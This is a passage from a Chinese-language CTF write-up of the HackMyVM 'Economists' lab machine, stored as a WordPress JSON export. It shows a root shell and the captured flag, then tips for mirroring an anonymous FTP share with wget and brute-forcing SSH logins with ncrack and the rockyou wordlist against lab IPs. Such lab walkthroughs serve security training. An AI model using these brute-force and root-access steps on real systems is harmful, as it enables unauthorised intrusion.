\u251c\u2500init.scope \n           \u2502 \u2514\u25001 \/sbin\/init maybe-ubiquity\n           \u2514\u2500system.slice \n             \u251c\u2500apache2.service \n             \u2502 \u251c\u2500753 \/usr\/sbin\/apache2 -k start\n             \u2502 \u251c\u2500755 \/usr\/sbin\/apache2 -k start\n             \u2502 \u2514\u2500756 \/usr\/sbin\/apache2 -k start\n             \u251c\u2500systemd-networkd.service \n             \u2502 \u2514\u2500640 \/lib\/systemd\/systemd-networkd\n             \u251c\u2500systemd-udevd.service \n             \u2502 \u2514\u2500398 \/lib\/systemd\/systemd-udevd\n             \u251c\u2500cron.service \n             \u2502 \u2514\u2500658 \/usr\/sbin\/cron -f\n             \u251c\u2500polkit.service \n             \u2502 \u2514\u2500681 \/usr\/lib\/policykit-1\/polkitd --no-debug\n             \u251c\u2500networkd-dispatcher.service \n             \u2502 \u2514\u2500680 \/usr\/bin\/python3 \/usr\/bin\/networkd-dispatcher --run-startup-triggers\n             \u251c\u2500multipathd.service \n             \u2502 \u2514\u2500558 \/sbin\/multipathd -d -s\n             \u251c\u2500accounts-daemon.service \n             \u2502 \u2514\u2500654 \/usr\/lib\/accountsservice\/accounts-daemon\n             \u251c\u2500ModemManager.service \n             \u2502 \u2514\u2500730 \/usr\/sbin\/ModemManager\n             \u251c\u2500systemd-journald.service \n             \u2502 \u2514\u2500362 \/lib\/systemd\/systemd-journald\n!\/bin\/bash\nroot@elite-economists:\/home\/joseph# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@elite-economists:\/home\/joseph# cd \/root\nroot@elite-economists:~# ls -la\ntotal 36\ndrwx------  5 root root 4096 Sep 14  2023 .\ndrwxr-xr-x 19 root root 4096 Sep 12  2023 ..\n-rw-------  1 root root    0 Sep 14  2023 .bash_history\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\n-rw-------  1 root root   65 Sep 13  2023 .lesshst\ndrwxr-xr-x  3 root root 4096 Sep 12  2023 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r--r--  1 root root 3271 Sep 14  2023 root.txt\ndrwx------  3 root root 4096 Sep 12  2023 snap\ndrwx------  2 root root 4096 Sep 12  2023 .ssh\nroot@elite-economists:~# cat root.txt \n\n                      ...................                 ....................                      \n                 .............................        .............................                 \n             ............              ...........     ......              ............             \n           ........                         ........                             ........           \n        ........              ...              ........           ....              .......         \n       ......                .....         ..     ......          .....                ......       \n     .............................        .....     ......        .............................     \n    ..............................       .....        .....       ..............................    \n                                        .....          .....                                        \n                                       .....            .....                                       \n                                      .....              .....                                      \n                                      .....              .....                                      \n                                     .....                ....                                      \n .................................................................................................. \n................................................................................................... \n                                     .....               .....                                      \n                                      .....              .....                                      \n                                      .....              .....                                      \n                                       .....            .....                                       \n                                        .....          .....                                        \n    ..............................       .....        .....       ..............................    \n     .............................        ......     .....        .............................     \n       ......                .....         .......     ..         .....                ......       \n        ........              ...            .......              ....              .......         \n           ........                            .........                         ........           \n             ...........               ......     ...........               ...........             \n                ..............................       ..............................                 \n                     .....................                ....................                      \n\nFlag: HMV{NwER6XWyM8p5VpeFEkkcGYyeJ}<\/code><\/pre>\n<h2>\u989d\u5916\u6536\u83b7<\/h2>\n<h3>ftp\u4e00\u952e\u4e0b\u8f7d\u6587\u4ef6<\/h3>\n<p>ftp\u4e0b\u8f7d\u6587\u4ef6\u4e5f\u53ef\u4ee5\u4f7f\u7528\u4e0b\u9762\u5e08\u5085\u7684\u65b9\u6cd5\uff0c\u4e0d\u7528\u624b\u52a8\u4e00\u4e2a\u4e00\u4e2aget\u4e86\uff01<\/p>\n<p><a href=\"https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Economists\/\">https:\/\/emvee-nl.github.io\/posts\/HackMyVM-Writeup-Economists\/<\/a><\/p>\n<pre><code class=\"language-bash\">wget -m ftp:\/\/ftp:@192.168.0.200<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(root\u327fkali)-[\/home\/kali\/temp\/economists]\n\u2514\u2500# wget -m ftp:\/\/ftp:@192.168.0.200\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/\n           =&gt; \u2018192.168.0.200\/.listing\u2019\nConnecting to 192.168.0.200:21... connected.\nLogging in as ftp ... Logged in!\n==&gt; SYST ... done.    ==&gt; PWD ... done.\n==&gt; TYPE I ... done.  ==&gt; CWD not needed.\n==&gt; PASV ... done.    ==&gt; LIST ... done.\n\n192.168.0.200\/.listing                    [=========================================&gt;]     588  --.-KB\/s    in 0s      \n\n2024-04-15 00:16:22 (143 MB\/s) - \u2018192.168.0.200\/.listing\u2019 saved [588]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Brochure-1.pdf\n           =&gt; \u2018192.168.0.200\/Brochure-1.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Brochure-1.pdf ... done.\nLength: 173864 (170K)\n\n192.168.0.200\/Brochure-1.pdf          100%[=========================================&gt;] 169.79K  --.-KB\/s    in 0.001s  \n\n2024-04-15 00:16:22 (204 MB\/s) - \u2018192.168.0.200\/Brochure-1.pdf\u2019 saved [173864]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Brochure-2.pdf\n           =&gt; \u2018192.168.0.200\/Brochure-2.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Brochure-2.pdf ... done.\nLength: 183931 (180K)\n\n192.168.0.200\/Brochure-2.pdf          100%[=========================================&gt;] 179.62K  --.-KB\/s    in 0.001s  \n\n2024-04-15 00:16:22 (228 MB\/s) - \u2018192.168.0.200\/Brochure-2.pdf\u2019 saved [183931]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Financial-infographics-poster.pdf\n           =&gt; \u2018192.168.0.200\/Financial-infographics-poster.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Financial-infographics-poster.pdf ... done.\nLength: 465409 (455K)\n\n192.168.0.200\/Financial-infographics- 100%[=========================================&gt;] 454.50K  --.-KB\/s    in 0.002s  \n\n2024-04-15 00:16:22 (284 MB\/s) - \u2018192.168.0.200\/Financial-infographics-poster.pdf\u2019 saved [465409]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Gameboard-poster.pdf\n           =&gt; \u2018192.168.0.200\/Gameboard-poster.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Gameboard-poster.pdf ... done.\nLength: 269546 (263K)\n\n192.168.0.200\/Gameboard-poster.pdf    100%[=========================================&gt;] 263.23K  --.-KB\/s    in 0.001s  \n\n2024-04-15 00:16:22 (327 MB\/s) - \u2018192.168.0.200\/Gameboard-poster.pdf\u2019 saved [269546]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Growth-timeline.pdf\n           =&gt; \u2018192.168.0.200\/Growth-timeline.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Growth-timeline.pdf ... done.\nLength: 126644 (124K)\n\n192.168.0.200\/Growth-timeline.pdf     100%[=========================================&gt;] 123.68K  --.-KB\/s    in 0s      \n\n2024-04-15 00:16:22 (362 MB\/s) - \u2018192.168.0.200\/Growth-timeline.pdf\u2019 saved [126644]\n\n--2024-04-15 00:16:22--  ftp:\/\/ftp:*password*@192.168.0.200\/Population-poster.pdf\n           =&gt; \u2018192.168.0.200\/Population-poster.pdf\u2019\n==&gt; CWD not required.\n==&gt; PASV ... done.    ==&gt; RETR Population-poster.pdf ... done.\nLength: 1170323 (1.1M)\n\n192.168.0.200\/Population-poster.pdf   100%[=========================================&gt;]   1.12M  --.-KB\/s    in 0.007s  \n\n2024-04-15 00:16:22 (168 MB\/s) - \u2018192.168.0.200\/Population-poster.pdf\u2019 saved [1170323]\n\nFINISHED --2024-04-15 00:16:22--\nTotal wall clock time: 0.05s\nDownloaded: 7 files, 2.3M in 0.01s (209 MB\/s)<\/code><\/pre>\n<h3>ncrack\u7206\u7834ssh<\/h3>\n<p>\u4e4b\u524d\u8bb0\u5f55\u8fc7\u4e86\uff0c\u4f46\u662f\u5fd8\u4e86\uff0c\u518d\u8bb0\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p>\u6765\u81ea<code>greenbrother<\/code>\u7684blog\uff1a<a href=\"https:\/\/kerszl.github.io\/hacking\/walkthrough\/Economists\/\">https:\/\/kerszl.github.io\/hacking\/walkthrough\/Economists\/<\/a><\/p>\n<pre><code class=\"language-bash\">ncrack -v -U users.txt -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/172.16.1.178<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Economists \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 192.168.0.200 &#8212; -A Op [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-563","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=563"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/563\/revisions"}],"predecessor-version":[{"id":564,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/563\/revisions\/564"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=563"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=563"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}